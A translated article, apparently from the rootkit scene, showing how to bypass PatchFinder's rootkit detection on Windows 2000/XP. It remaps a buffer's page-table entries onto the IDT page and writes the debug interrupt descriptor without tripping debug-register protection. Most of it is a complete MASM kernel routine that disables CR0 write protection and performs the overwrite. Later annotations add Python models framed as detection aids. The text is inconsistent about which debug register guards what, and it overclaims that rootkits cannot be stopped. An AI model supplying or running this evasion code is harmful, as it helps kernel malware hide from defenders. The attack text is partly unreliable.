Attackers can bypass the Windows Rootkit detection system.


[Introduction]


PatchFinder is a well-designed program that uses EPA (Execution Path Analysis) to detect rootkits that intrude into the kernel. References [1] and [2] explain how it works. This article presents a way to bypass EPA.

[Method]

EPA relies on the single-step mode of Intel processors and uses entry 0x01 of the Interrupt Descriptor Table (IDT). To prevent a rootkit from modifying this entry, it uses the debug registers (DR0, DR1) to protect the debug handler (a good idea). Entry 0x1 is protected by the DR0 register and the interrupt handler by the DR1 register (see Note 1).
However, read the Intel manual [3]: "Each debug address register (DR0 to DR3) holds the 32-bit linear address of a breakpoint." Note: a linear address! In Windows 2000/XP, linear addresses are translated to physical addresses by paging. Assume the base address of the IDT is 0x8003F400 and is stored in IDTR; the address of IDT entry 0x01 is then 0x8003F408. Intel's description of IDTR: "The base address points to entry 0x00 of the IDT." In Windows 2000/XP the page directory pointed to by the CR3 register is mapped at the linear address 0xC0300000. A linear address is composed of a directory index, a table index, and an offset. Through the paging mechanism, 0x8003F408 translates to the physical address 0x03F00 (observed experimentally). Now we create a buffer, take a pointer to it, and modify the page directory and page table so that the buffer maps to the physical address 0x03F00. Whatever is written to this buffer is then written into the IDT without triggering PatchFinder's protection mechanism. The debug registers cannot protect this memory at all, because they cannot protect physical memory.
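As an added illustration that is not part of the original article, the following Python model reproduces the address arithmetic of the method above (page directory self-mapped at 0xC0300000, page tables at 0xC0000000) and shows the check a detector needs in addition to arming debug registers: walk the page tables for any second linear mapping of the frame that holds the protected IDT page. The buffer address and frame numbers are constructed sample values.

```python
PAGE_DIR_VA = 0xC0300000   # self-mapped page directory (value used in the article)
PAGE_TAB_VA = 0xC0000000   # self-mapped page tables (value used in the article)

def pde_slot(va):
    """Linear address of the PDE that maps va: 0xC0300000 + (va >> 22) * 4."""
    return PAGE_DIR_VA + ((va >> 22) << 2)

def pte_slot(va):
    """Linear address of the PTE that maps va: 0xC0000000 + (va >> 12) * 4."""
    return PAGE_TAB_VA + ((va >> 12) << 2)

class PagingModel:
    """Toy MMU: 4 KB pages, PTEs keyed by virtual page number, byte-addressed RAM."""
    def __init__(self):
        self.pte = {}   # virtual page number -> PTE value (frame | flags)
        self.mem = {}   # physical address -> byte value
    def map_page(self, va, pfn, flags=0x3):       # flags 0x3 = present + writable
        self.pte[va >> 12] = (pfn << 12) | flags
    def translate(self, va):
        entry = self.pte.get(va >> 12, 0)
        if not entry & 1:
            raise MemoryError(f"page fault at {va:#x}")
        return (entry & ~0xFFF) | (va & 0xFFF)
    def write32(self, va, value):
        pa = self.translate(va)
        for i in range(4):
            self.mem[pa + i] = (value >> (8 * i)) & 0xFF
    def read32(self, va):
        pa = self.translate(va)
        return sum(self.mem.get(pa + i, 0) << (8 * i) for i in range(4))

    def aliases_of(self, va):
        """Detector check: other linear pages currently backed by va's frame
        (a debug register only compares its own linear address)."""
        frame = self.translate(va) & ~0xFFF
        return sorted(vpn << 12 for vpn, e in self.pte.items()
                      if e & 1 and (e & ~0xFFF) == frame and vpn != va >> 12)

def scenario():
    """Constructed sample: IDT entry 0x01 at 0x8003F408, a pool buffer at 0x81234000."""
    mmu = PagingModel()
    idt_entry1, buf = 0x8003F408, 0x81234000      # buffer address is made up
    mmu.map_page(idt_entry1, 0x3F)                # constructed frame numbers
    mmu.map_page(buf, 0x1234)
    clean = mmu.aliases_of(idt_entry1)            # before remapping: no aliases
    mmu.pte[buf >> 12] = mmu.pte[idt_entry1 >> 12]       # the PTE copy the article performs
    mmu.write32(buf + (idt_entry1 & 0xFFF), 0xDEADBEEF)  # same page offset, other page
    return clean, mmu.aliases_of(idt_entry1), mmu.read32(idt_entry1)
```

The alias scan reports the buffer page as a second mapping of the IDT frame, and reading entry 0x01 through its own linear address shows the bytes written via the alias.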

[Source code]

The source code is assembled with MASM v8.0, because I like assembly language :-). The full source code can be found at www.rootkit.com.

; --- Definition of the IDTR structure -------
DIDTR STRUCT                          ; IDTR as stored by SIDT
    dlimit  WORD ?
    ibase   DWORD ?
DIDTR ENDS
;-----------------------

BypassIDTProtection PROC

    LOCAL dbgHandler:DWORD

    LOCAL myIDT:DIDTR

    LOCAL idtbase:DWORD
    LOCAL idtbaseoff:DWORD
    LOCAL idtpvdf:DWORD
    LOCAL idtPDEaddr:DWORD
    LOCAL idtPTE:DWORD
    LOCAL idtPTEaddr:DWORD

    LOCAL varbase:DWORD
    LOCAL varbaseoff:DWORD
    LOCAL varpvdf:DWORD
    LOCAL varPDEaddr:DWORD
    LOCAL varPTE:DWORD
    LOCAL varPTEaddr:DWORD

    LOCAL diffoffset:DWORD

    pushad

    ; allocate one page of memory (from the non-paged pool)
    invoke ExAllocatePool, NonPagedPoolMustSucceed, 01000h
    mov varbase, eax

    cli                                 ; remember to restore with sti

    invoke DisablePageProtection        ; clear CR0.WP; an old technique used by Regmon on XP

    sidt myIDT
    mov eax, myIDT.ibase
    add eax, 08h
    mov idtbase, eax                    ; idtbase = IDT base address + 8 bytes (entry 0x01)

    and eax, 0FFC00000h                 ; page directory index of the IDT address
    shr eax, 22
    shl eax, 2                          ; multiply by 4

    mov ebx, 0C0300000h                 ; 0C0300000h = page directory
    add ebx, eax                        ; ebx = page directory + directory index * 4
    mov idtPDEaddr, ebx

    mov eax, [ebx]
    mov idtpvdf, eax                    ; eax = PDE of the IDT address

    mov eax, idtbase
    and eax, 0FFFh                      ; low 12 bits of the IDT address = page offset
    mov idtbaseoff, eax

    mov eax, idtbase
    shr eax, 12                         ; high 20 bits of the IDT address = page number
    shl eax, 2                          ; multiply by 4

    mov ebx, 0C0000000h                 ; the page tables are mapped into the 4 MB starting at 0C0000000h
    add ebx, eax
    mov idtPTEaddr, ebx                 ; address of the PTE for the IDT address

    mov eax, [ebx]
    mov idtPTE, eax                     ; PTE of the IDT address

    mov eax, varbase

    and eax, 0FFC00000h                 ; page directory index of varbase
    shr eax, 22
    shl eax, 2

    mov ebx, 0C0300000h
    add ebx, eax
    mov varPDEaddr, ebx

    mov eax, [ebx]
    mov varpvdf, eax                    ; PDE of varbase

    mov eax, varbase
    and eax, 0FFFh                      ; page offset of varbase
    mov varbaseoff, eax

    mov eax, varbase
    shr eax, 12
    shl eax, 2

    mov ebx, 0C0000000h
    add ebx, eax
    mov varPTEaddr, ebx                 ; address of the PTE for varbase

    mov eax, [ebx]
    mov varPTE, eax                     ; PTE of varbase

    mov eax, varPDEaddr                 ; make the PDE the same as that of IDT entry 0x01
    mov ebx, idtpvdf
    mov [eax], ebx

    mov eax, varPTEaddr                 ; make the PTE the same as that of IDT entry 0x01
    mov ebx, idtPTE
    mov [eax], ebx

    mov ebx, idtbaseoff                 ; correct for the page offset
    mov eax, varbaseoff
    sub ebx, eax

    ; now a linear address can be used to write into descriptor 0x01 of the IDT
    ; without triggering the debug registers
    mov eax, varbase
    mov dword ptr [eax + ebx], 0DEADBEEFh

    mov eax, varPDEaddr                 ; restore the original PDE
    mov ebx, varpvdf
    mov [eax], ebx

    mov eax, varPTEaddr                 ; restore the original PTE
    mov ebx, varPTE
    mov [eax], ebx

    invoke EnablePageProtection         ; restore the WP flag of the CR0 register

    sti

    popad
    ret

BypassIDTProtection ENDP
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; CR0.WP is bit 16 (10000h). The two helpers below set and clear it; in the
; original listing their bodies were swapped, which would have left WP cleared.
EnablePageProtection PROC

    push eax
    mov eax, CR0
    or eax, NOT 0FFFEFFFFh              ; NOT 0FFFEFFFFh = 00010000h, set WP
    mov CR0, eax
    pop eax
    ret

EnablePageProtection ENDP
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DisablePageProtection PROC

    push eax
    mov eax, CR0
    and eax, 0FFFEFFFFh                 ; clear WP
    mov CR0, eax
    pop eax
    ret

DisablePageProtection ENDP
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

[Future of Rootkit]

Unfortunately, this method makes EPA useless. Unless Microsoft changes its security architecture, there is no way to block rootkits in the future. Rootkits will increasingly build on the paging mechanism, which offers unlimited possibilities. Once ring 0 has been entered, the rootkit stays in ring 0.

[Reference]

[1] Joanna Rutkowska, Advanced Windows 2000 Rootkit Detection
[2] Joanna Rutkowska, Detecting Windows Server Compromises with PatchFinder2
[3] IA-32 Intel Architecture Software Developer's Manual, Volumes 1-3

Note 1:

The diagram could not be reproduced here, so readers may not be able to follow it (the drawing was too simplistic -_-). Here I add the principle of using the debug registers to protect an address. First, the four debug registers DR0 to DR3 hold four linear addresses; then the corresponding bits of the DR7 register are set, and the corresponding bits of the DR6 register are checked in the handler, to act on accesses to these four addresses. Refer to the following code:

#define DB_PROT_EXEC  0
#define DB_PROT_WRITE 1
#define DB_PROT_RW    3

#define DB_DR0 0
#define DB_DR1 1
#define DB_DR2 2
#define DB_DR3 3

#define DB_LEN_1B 0
#define DB_LEN_2B 1
#define DB_LEN_4B 3

/* load the linear address into DRreg and arm it in DR7 with the given length and access type */
int dbProtect(int reg, int addr, int len, int protection) {
    unsigned int dr7mask;

    switch (reg) {
    case 0:
        __asm {
            mov eax, addr
            mov DR0, eax
        }
        break;
    case 1:
        __asm {
            mov eax, addr
            mov DR1, eax
        }
        break;
    case 2:
        __asm {
            mov eax, addr
            mov DR2, eax
        }
        break;
    case 3:
        __asm {
            mov eax, addr
            mov DR3, eax
        }
        break;
    }

    dr7mask = 0x2 << (reg * 2);                                  /* global enable bit Gn */
    dr7mask |= ((len << 2) + protection) << (16 + (4 * reg));    /* LENn and R/Wn fields */
    __asm {
        mov eax, DR7
        or eax, dr7mask
        mov DR7, eax
    }

    return 1;
}

/* set the GD (general detect) bit so that any access to a debug register traps */
int dbSetGeneralProtection() {

    __asm {
        mov eax, DR7
        or eax, 0x1000
        mov DR7, eax
    }

    return 1;
}

Then add the following code to the interrupt handler:

    mov eax, DR6
    test ax, 0x100f      // BD | B3 | B2 | B1 | B0
    .
    .
    mov eax, DR6         // check the BS (single-step) bit of DR6
    test ah, 0x40

Finally, the three addresses are protected to different degrees:

    dbProtect(DB_DR0, (int)getIntGateAddr(NT_DEBUG_INT), DB_LEN_4B, DB_PROT_WRITE);
    dbProtect(DB_DR1, (int)getIntGateAddr(NT_DEBUG_INT) + 4, DB_LEN_4B, DB_PROT_WRITE);
    dbProtect(DB_DR2, (int)NewDebugHandler1, DB_LEN_4B, DB_PROT_RW);

If you are not familiar with the functions of DR6 and DR7, see Section 15.2, "Debug Registers", of the Intel manual.
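As an added example, not from the original article or from PatchFinder, the Python below models DR0-DR3 and DR7 with the same bit arithmetic as dbProtect(), decodes the three protections set above, and answers the question a defender has to ask of this configuration: which linear accesses actually trap. The handler address is a made-up placeholder; the gate address is the one used in this article.

```python
DB_PROT_EXEC, DB_PROT_WRITE, DB_PROT_RW = 0, 1, 3     # R/Wn field values
DB_LEN_1B, DB_LEN_2B, DB_LEN_4B = 0, 1, 3             # LENn field values
LEN_BYTES = {DB_LEN_1B: 1, DB_LEN_2B: 2, DB_LEN_4B: 4}

class DebugRegs:
    """Software model of DR0-DR3 plus DR7 (enable bits, R/Wn and LENn fields)."""
    def __init__(self):
        self.dr = [0, 0, 0, 0]
        self.dr7 = 0

    def db_protect(self, reg, addr, length, protection):
        """Same bit arithmetic as dbProtect() above: load DRreg, arm it in DR7."""
        self.dr[reg] = addr
        self.dr7 |= 0x2 << (reg * 2)                                 # Gn enable bit
        self.dr7 |= ((length << 2) + protection) << (16 + 4 * reg)   # LENn:R/Wn field

    def armed(self):
        """Decode DR7 into (reg, linear address, length in bytes, condition)."""
        out = []
        for reg in range(4):
            if self.dr7 & (0x3 << (reg * 2)):                # Ln or Gn set
                field = (self.dr7 >> (16 + 4 * reg)) & 0xF
                out.append((reg, self.dr[reg], LEN_BYTES[field >> 2], field & 0x3))
        return out

    def traps(self, linear_addr, size, write):
        """True if a data access of `size` bytes at linear_addr hits an armed DRn.
        The CPU compares linear addresses only, over the length-aligned range."""
        for _, addr, length, cond in self.armed():
            if cond == DB_PROT_EXEC or (cond == DB_PROT_WRITE and not write):
                continue
            lo = addr & ~(length - 1)
            if linear_addr < lo + length and linear_addr + size > lo:
                return True
        return False

def patchfinder_layout(gate=0x8003F408, handler=0x8FF00000):
    """The three dbProtect() calls from Note 1; the handler address is a placeholder."""
    d = DebugRegs()
    d.db_protect(0, gate, DB_LEN_4B, DB_PROT_WRITE)       # DR0: gate descriptor, low dword
    d.db_protect(1, gate + 4, DB_LEN_4B, DB_PROT_WRITE)   # DR1: gate descriptor, high dword
    d.db_protect(2, handler, DB_LEN_4B, DB_PROT_RW)       # DR2: handler code, read or write
    return d
```

A write to the descriptor through its own linear address traps, while the same bytes reached through a different linear address (the aliasing described in the Method section) are outside every armed range, which is exactly why a linear-address breakpoint alone is not a sufficient check.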
